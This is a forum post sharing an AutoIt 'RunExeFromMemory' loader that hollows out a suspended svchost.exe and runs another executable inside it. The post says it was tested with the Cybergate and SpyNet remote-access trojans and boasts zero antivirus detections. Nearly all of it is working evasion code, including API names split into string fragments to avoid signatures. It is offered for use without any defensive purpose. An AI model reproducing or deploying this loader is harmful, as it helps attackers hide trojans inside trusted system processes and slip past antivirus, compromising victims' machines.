ka0z Posted March 10, 2013 Report Share Posted March 10, 2013 RunExeFromMemory ( Base Function )Author : M3Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory BaseTested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32;==============================================================================; RunExeFromMemory ( Base Function ); Author : M3; Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base; Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32; Detections : 0 | 35 http://scanner.udtools.net/reporte.php?id=m3py_ubxG;==============================================================================#include<WINAPI.au3>#include <[Includes]\_ThreadContext.au3>RunBinaryInMemory(FileRead(@DesktopDir & "\Server.exe" ) )Func RunBinaryInMemory($bBinaryImage)Global $sNTDLL = "ntdll"Global $sKernel32 = "kernel32"Global $sEbx = "Ebx"Global $sValue = 0x00400000Local $pPointer , $tSTARTUPINFO , $tPROCESS_INFORMATION ,$hProcess , $hThread , $tCONTEXT , $tIMAGE_DOS_HEADER , $tIMAGE_NT_SIGNATURE , _$tIMAGE_FILE_HEADER , $iNumberOfSections , $iEntryPointNEW , $pOptionalHeaderImageBaseNEW , $iOptionalHeaderSizeOfImageNEW , $pHEADERS_NEW , _$tIMAGE_SECTION_HEADER, $sCONTEXT , $iSizeOfRawData, $pPointerToRawData, $iVirtualAddress ,$tInput , $iRunFlag , $CONTEXT_FUL$tInput = DllStructCreate("Boolean[" & sReadBytes($bBinaryImage) & "]")DllStructSetData($tInput, 1, $bBinaryImage)$pPointer = DllStructGetPtr($tInput)$tSTARTUPINFO = DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;ushort ShowWindow;ushort Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")$tPROCESS_INFORMATION = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")_WinAPI_CreateProcess(@SystemDir & "\svchost.exe", 0 , 0 , 0 , 0 , 4 , 0 , 0 , DllStructGetPtr($tSTARTUPINFO), DllStructGetPtr($tPROCESS_INFORMATION))$hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")$hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")$tCONTEXT = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")$iRunFlag = 1Switch $iRunFlagCase 1$CONTEXT_FULL = 0x10007Case 2$CONTEXT_FULL = 0x100007Case 3$CONTEXT_FULL = 0x80027EndSwitchDllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)DllCall($sNTDLL, "int", "NtGetContextThread", "ptr", $hThread, "ptr", DllStructGetPtr($tCONTEXT))$tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];ushort BytesOnLastPage;ushort Pages;ushort Relocations;ushort SizeofHeader;ushort MinimumExtra;ushort MaximumExtra;ushort SS;ushort SP;ushort Checksum;ushort IP;ushort CS;ushort Relocation;ushort Overlay;char Reserved[8];ushort OEMIdentifier;ushort OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $pPointer)$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader")$tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)$pPointer += 4$tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;ushort NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;ushort SizeOfOptionalHeader;ushort Characteristics", $pPointer)$iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")$pPointer += 20$tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes" ,$pPointer)$pPointer += 96$iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")$pPointer += 128$pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase")$iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage")$sCONTEXT = DllStructGetData($tCONTEXT, $sEbx) + 8$hBaseAddress = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBaseAddress")_NtWriteVirtualMemory( $hProcess, $sCONTEXT , $pOptionalHeaderImageBaseNEW, 4, 0)_sUnmapViewOfSection($hProcess, $hBaseAddress)_VirtualAllocEx ( $hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)$pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER)$iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")_ProcessMemoryWrite ( $hProcess, $sValue, $pHEADERS_NEW, $iOptionalHeaderSizeOfHeadersNEW)For $i = 1 To $iNumberOfSections$tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;ushort NumberOfRelocations;ushort NumberOfLinenumbers;dword Characteristics", $pPointer)$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")$pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")_ProcessMemoryWrite( $hProcess, $sValue + $iVirtualAddress, $pPointerToRawData, $iSizeOfRawData)$pPointer += 40NextDllStructSetData($tCONTEXT, "Eax", $sValue + $iEntryPointNEW)_ThreadSetContext ($hThread, $tCONTEXT)_ThreadResume($hThread)EndFuncFunc sReadBytes($Data)Local $Value = BinaryLen($Data)Return $ValueEndFuncFunc _sUnmapViewOfSection($hProcess, $pAddress)$sRet = DllCall($sNTDLL, "int", "NtUnmap" & "ViewOfSection", "ptr", $hProcess, "ptr", $pAddress)return $sRetEndFuncFunc _VirtualAllocEx($hProcess, $pAddress, $iSize)$aCall = DllCall($sKernel32, "ptr", "Virtual" & "AllocEx", "handle", $hProcess, "ptr", $pAddress, "dword_ptr", $iSize, "dword", 0x3000,"dword", 64)Return $aCallEndFuncFunc _NtWriteVirtualMemory($hProcess, $lpBaseAddress, $lpBuffer, $nSize, $lpNumberOfBytesWritten)Local $Return$Return = DllCall($sNTDLL, "int", "NtWrite" & "VirtualMemory", "int", $hProcess, "ptr", $lpBaseAddress, "ptr*", $lpBuffer, "int", $nSize, "int", $lpNumberOfBytesWritten)Return $ReturnEndFunc Quote Link to comment Share on other sites More sharing options...
